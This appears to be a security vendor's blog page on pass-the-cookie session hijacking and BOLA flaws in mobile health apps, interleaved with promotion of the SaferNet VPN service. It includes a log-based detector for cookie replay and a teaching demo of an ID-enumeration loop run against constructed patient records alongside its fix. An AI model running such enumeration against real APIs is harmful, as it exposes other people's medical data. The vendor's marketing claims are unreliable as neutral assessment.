The world of cybersecurity is effectively cyber-warfare, and just as the physical world’s warfare is an arms-race, so is cyber-warfare a cyber-arms-race. If 2FA was a leap forward by the ‘good guys’, Pass-The-Cookie is the new armament for hackers in the race for total security, or insecurity depending on your viewpoint.

With pass-the-cookie, the attacker does not attack 2FA at all. 2FA is checked once, at login; after it has been passed, the server hands the browser a session cookie and trusts that cookie for every later request. The attacker steals that already-authenticated cookie, for example from the browser's cookie store on a compromised machine, and presents it from their own browser. The server sees a valid session that has already cleared 2FA, so it never asks for the second factor again, and the attacker can move freely within the account for as long as the cookie stays valid. The cookie is not forged or poisoned; it is simply reused.

This was once considered, if not impossible, then very unlikely. Since the start of 2021, however, there has been a series of attacks using this method, which prompted the US government to release an advisory on the issue.
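Because the server cannot distinguish a replayed cookie from the original, pass-the-cookie is found after the fact, in logs: the same session cookie suddenly arriving from a different client. The following added example, not from the original article or any vendor, hunts for that pattern over a constructed web access log. The log format, the `SAMPLE_LOG` entries, the IP addresses (documentation ranges) and the `find_session_reuse` name are all assumptions for this example; adapt `parse_line` to your own server's format.

```python
from collections import defaultdict
from datetime import datetime
from typing import Dict, List

# Constructed access log for this example, one request per line:
# timestamp  session cookie  client IP  User-Agent (may contain spaces).
SAMPLE_LOG = """\
2021-02-01T09:00:12Z sid=7f3a9c 203.0.113.5 Mozilla/5.0 (Windows NT 10.0) Chrome/88.0
2021-02-01T09:05:40Z sid=7f3a9c 203.0.113.5 Mozilla/5.0 (Windows NT 10.0) Chrome/88.0
2021-02-01T11:47:03Z sid=7f3a9c 198.51.100.77 python-requests/2.25.1
2021-02-01T09:10:00Z sid=b1c2d3 192.0.2.10 Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) Safari/604.1
2021-02-01T09:30:00Z sid=b1c2d3 192.0.2.11 Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) Safari/604.1
"""


def parse_line(line: str) -> Dict[str, object]:
    """Parse one constructed log line into its fields."""
    ts, sid, ip, ua = line.split(" ", 3)
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "sid": sid.split("=", 1)[1],
        "ip": ip,
        "ua": ua,
    }


def find_session_reuse(log_text: str) -> Dict[str, Dict[str, object]]:
    """Return, per session id, the distinct clients that presented it.

    Only sessions seen from more than one client are reported. A changed
    User-Agent is rated 'high': a legitimate user roaming between networks
    keeps the same browser, whereas a replayed cookie usually arrives from
    the attacker's own browser or tooling. An IP change alone is rated 'low'.
    """
    events: Dict[str, List[Dict[str, object]]] = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            event = parse_line(line)
            events[event["sid"]].append(event)

    findings = {}
    for sid, evs in events.items():
        evs.sort(key=lambda e: e["ts"])
        ips = sorted({e["ip"] for e in evs})
        uas = sorted({e["ua"] for e in evs})
        if len(ips) == 1 and len(uas) == 1:
            continue  # one client for the whole session: nothing to report
        findings[sid] = {
            "ips": ips,
            "user_agents": uas,
            "first_seen": evs[0]["ts"].isoformat(),
            "last_seen": evs[-1]["ts"].isoformat(),
            "severity": "high" if len(uas) > 1 else "low",
        }
    return findings


if __name__ == "__main__":
    for sid, finding in find_session_reuse(SAMPLE_LOG).items():
        print(sid, finding["severity"], finding["ips"], finding["user_agents"])
```

In the sample, session 7f3a9c is used by a Windows Chrome browser all morning and then by a python-requests client from a different address, the classic replay signature, while b1c2d3 merely moves between two addresses with the same iPhone browser. One caveat for real deployments: do not write full session cookie values into a report or ticket, since the report would then itself be a source of replayable cookies; hash them first.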

What You Can Do About Session Hijacking and Poison Cookies

Session Hijacking is without a doubt one of the most common forms of cybercrime. Thankfully, protection against it is simple. While no approach will guarantee 100% safety, SaferNet can get you pretty close!

Session hijacking by sniffing relies on being able to read session cookies as they cross the network. That only works where the traffic is unencrypted: any site still served over plain HTTP, and any HTTPS site that sets its cookies without the Secure flag and so lets the browser send them over HTTP. SaferNet's VPN encrypts all of your traffic with 256-bit encryption, so anyone sniffing the network you're on sees only garbled, nonsensical data, which shuts down network sniffing before hijacking can begin. A VPN does not stop cookies being stolen by XSS or by malware already on the device, so the other precautions in this article still matter.

SaferNet is the perfect solution to the cybersecurity issues that individuals, families, and businesses face today. It not only connects every device using a secure, 24/7 always on, military grade VPN, but it also stops outside cyberthreats, malware and viruses as well. On SaferNet, all users are protected anywhere in the world, all the time, on any cellular or Wi-Fi network. In addition to SaferNet's VPN and cyber protection, it also offers a range of employee or parental/family internet controls including internet filtering, monitoring, scheduling, and blocking access to websites or even entire website categories.

Typically, a business or family would need 3 separate services for a VPN, Malware Protection, and Internet Controls; SaferNet offers all 3 features in one service. SaferNet truly is an endpoint security presence that can be implemented in minutes around the world, on phones, laptops, tablets, and computers at an economical price point that caters to all sizes of businesses and families. SaferNet guarantees a smooth setup and installation process that takes only minutes, and an easily accessible control hub for you to monitor all your employees' or family members' devices, including activity, time spent online, and threats blocked.

mHealth Breach: 23 Million Users of Mobile Health Apps Exposed to Attacks

mHealth (meaning "mobile health") applications once had a niche place in the app ecosystem. mHealth first appeared to help manage chronic conditions, from diabetes to thyroid issues, maternal care, asthma and more. It then expanded to include mental health and even holistic approaches such as meditation.

Pre-2020, perhaps the biggest surge in the mHealth market came from how we integrated fitness with the internet: Instagram fitness influencers, wearables like the Apple Watch, and sharing our fitness statistics with friends and teammates. Thanks to mHealth, hard numbers about our own fitness are more visible now than at any other point in history.

mHealth has seen a steady rise in popularity, especially among hospitals and caregivers, and the apps grew more complex as functionality was added. At the higher end of the spectrum they also grew more personal: many require medical information, medical history, names, addresses and even Social Security numbers. In 2018 it was reported that "73% of hospitals surveyed have developed or were developing mobile strategies to address the communications, collaboration, and computing requirements of clinical professionals and other mobile workers across medical departments, standalone hospitals, and ambulatory environments." The World Health Organisation (WHO) said mHealth brought "New horizons for health through mobile technologies."

Even so, if you weren't involved in the medical field, didn't have a chronic illness or other health concern, or preferred to track your fitness in a more analog way, you may not have heard much about mHealth. Our approach to health as a whole changed, of course, with the COVID-19 outbreak. mHealth stood out as the ideal way to track infections and implement contact tracing, and more than 60 governments deployed COVID-19 mHealth applications for their citizens.

If anything becomes popular in our digital society, it eventually draws the gaze of cybercriminals and criminal organizations. To counter this, best practices exist as the first line of defence. For mHealth, those practices have not been followed, which has left many users exposed to data breaches and identity theft.

mHealth Vulnerability

In early February 2021, Knight Ink published a vulnerability study of major mHealth apps with startling results. Alissa Knight, the founder of Knight Ink, tested 30 leading apps under an agreement not to publicly name the vulnerable ones. All 30 turned out to have major vulnerabilities, most of them in their APIs. An API, or application programming interface, is the interface through which an app talks to its back-end servers and databases; most apps use several. Weaknesses in how those APIs were built meant that attackers could readily intercept Personally Identifiable Information (PII) and Protected Health Information (PHI).

Furthermore, nearly 30% of the apps had no code obfuscation, so they could easily be reverse-engineered, and many also lacked certificate-based protections that guard their traffic against interception. Every one of the 30 apps was vulnerable to Broken Object Level Authorization (BOLA). Functionally, this means the check that a user is allowed to view a given record has not been applied correctly, so anyone who knows how to ask can read any other person's PII and PHI. BOLA is among the most serious attacks that can be carried out against an application holding sensitive records. In her report, Knight said, "Simply put, a BOLA vulnerability enables an adversary to substitute the ID of a resource with the ID of another. When the object ID can be directly called in the URI, it opens the endpoint up to ID enumeration that allows an adversary the ability to read objects that don't belong to them. These exposed references to internal implementation objects can point to anything, whether it's a file, directory, database record or key." Access to patient records means nearly everything is available to the attacker: lab results, X-ray images, blood work, family history, birth dates, Social Security numbers and more.
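The BOLA pattern Knight describes, shown as an added example that is not from her report or from any real mHealth app: a record lookup that authenticates the caller but never checks that the record is theirs, next to the fixed version, and the enumeration loop an adversary runs against each. The patient records, usernames, sequential ids and the `get_record_vulnerable`, `get_record_fixed` and `enumerate_records` names are all constructed for this example.

```python
from typing import Callable, Dict, Iterable, Optional

Record = Dict[str, str]

# Constructed patient records, keyed by a guessable sequential id as many
# backends do. The owner field is the username allowed to read the record.
RECORDS: Dict[int, Record] = {
    1001: {"owner": "alice", "lab_results": "HbA1c 5.4%"},
    1002: {"owner": "bob",   "lab_results": "HbA1c 7.9%"},
    1003: {"owner": "carol", "lab_results": "HbA1c 6.1%"},
}

Handler = Callable[[str, int], Optional[Record]]


def get_record_vulnerable(requesting_user: str, record_id: int) -> Optional[Record]:
    """GET /records/{id}, authenticated but not authorized.

    The caller had to log in, but nothing checks that the record belongs to
    them, so substituting another id in the URI returns someone else's data.
    """
    return RECORDS.get(record_id)


def get_record_fixed(requesting_user: str, record_id: int) -> Optional[Record]:
    """The same endpoint with an object-level authorization check.

    'Not found' and 'not yours' both return None so the response cannot be
    used to discover which ids exist.
    """
    record = RECORDS.get(record_id)
    if record is None or record["owner"] != requesting_user:
        return None
    return record


def enumerate_records(handler: Handler, requesting_user: str,
                      id_range: Iterable[int]) -> Dict[int, Record]:
    """What the adversary does: walk the id space and keep whatever comes back."""
    found: Dict[int, Record] = {}
    for record_id in id_range:
        record = handler(requesting_user, record_id)
        if record is not None:
            found[record_id] = record
    return found


if __name__ == "__main__":
    ids = range(1000, 1010)
    print("vulnerable:", sorted(enumerate_records(get_record_vulnerable, "alice", ids)))
    print("fixed:     ", sorted(enumerate_records(get_record_fixed, "alice", ids)))
```

Walking ten ids as "alice" returns all three patients' records from the vulnerable handler and only her own from the fixed one. The check must live in the handler (or a shared authorization layer the handler cannot skip); obfuscating the client or hiding the id format only slows enumeration down, it does not stop it.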

Medical Records and Hackers

Medical records have long sat high on any hacker's list of targets, because they provide a treasure trove of information about thousands of individuals. We often hear of hospitals suffering data breaches, and this is why. Asked about the going rate for medical information, Knight said a Social Security number sells for about $1 and a credit-card number for about $110, but the real money is in full medical records, at about $1,000 apiece. They command that price because a single record contains everything an organisation needs to carry out identity theft: all of the PII and PHI in one place. Although breaches make the headlines, there is a much larger number of stories about how hackers failed to penetrate a hospital's network. Because they carry such a target on their back, hospitals run some of the best cybersecurity in the industry, and that is exactly why a vulnerability in mHealth is so notable. With the advent of COVID-19, hospitals rely on mHealth more than ever, and attackers no longer need to defeat a hospital's defences when they can pull the same information out of a series of mHealth apps.

Better Cybersecurity Practices

Knight's report is recent, and nearly all of the mHealth vendors on the list have been rushing to make security changes. That may be too late, and data may already have been taken: attackers don't always leave a trail of breadcrumbs after an information heist. Apps, mHealth or otherwise, nearly always have some vulnerabilities. Humans are flawed, and so is the software they write. Those vulnerabilities are usually small-scale, though, and what Knight found in mHealth is less human error than human negligence. It is clear that the developers of these apps and the management behind them did not follow cybersecurity best practices. Missing certificate protections, skipped code obfuscation and APIs left open to BOLA are not slips; they reflect a lack of planning and consideration.

Outside app development, many best practices are ignored by individuals across the industry. Many of the breaches we hear about, especially in small and medium businesses, could be avoided with education, care and the right tools. We are at a crossroads for cybersecurity in the workplace, and business leaders must take heed and act accordingly. One tool business leaders can implement is SaferNet, whose combination of an always-on VPN, malware protection and employee or family internet controls in a single service is described earlier on this page.